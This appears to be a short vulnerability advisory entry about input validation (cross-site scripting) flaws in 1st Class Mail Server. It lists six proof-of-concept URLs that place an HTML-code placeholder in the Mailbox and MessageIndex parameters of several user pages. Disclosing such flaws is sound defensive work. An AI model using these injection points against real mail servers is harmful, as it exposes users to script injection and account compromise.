• info
• discussion
• exploit
• solution
• references

1st Class Internet Solutions 1st Class Mail Server Multiple Input Validation Vulnerabilities

No exploit is required.

The following proof of concept examples have been provided:
http://www.example.com/AUTH=[some_value]/user/viewmail.tagz?Site=www.example.com&Mailbox=3&MessageIndex=[html_code]>
http://www.example.com/AUTH=[some_value]/user/?Site=www.example.com&Mailbox=[html_code]
http://www.example.com/AUTH=[some_value]/user/members.tagz?Site=www.example.com&Mailbox=[html_code]
http://www.example.com/AUTH=[some_value]/user/general.tagz?Site=www.example.com&Mailbox=[html_code]
http://www.example.com/AUTH=[some_value]/user/advanced.tagz?Site=www.example.com&Mailbox=<[html_code]>
http://www.example.com/AUTH=[some_value]/user/list.tagz?Site=www.example.com&Mailbox=[html_code]